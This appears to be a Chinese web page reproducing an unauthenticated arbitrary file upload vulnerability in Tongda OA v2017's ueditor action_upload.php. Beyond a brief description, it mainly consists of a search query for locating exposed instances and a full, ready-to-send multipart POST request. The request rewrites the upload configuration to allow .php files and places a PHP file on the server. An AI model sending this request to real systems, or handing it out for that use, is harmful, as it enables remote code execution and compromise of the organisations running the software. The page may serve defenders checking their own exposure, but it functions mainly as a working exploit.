通达OA v2017 action_upload.php 任意文件上传漏洞

漏洞描述

通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞。

漏洞影响

通达OA v2017

网络测绘

app=”TDXK-通达OA”

漏洞复现

访问获取版本信息

20231123110738313-d3cd69c0-e708-415d-b6cf-77dbb5dcbd9e (1)

发送请求包上传任意文件

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 893
Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip

-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

ffff
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

1000000000
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

tcmd
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="mufile"

submit
-----------------------------55719851240137822763221368724--

20231123110838960-804d5c5c-2df3-46e5-b6d1-f8eb5eea4fe3 (1)

再访问上传的文件

20231123110938647-b35370f7-63ef-48c3-a0be-532cb16037de (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容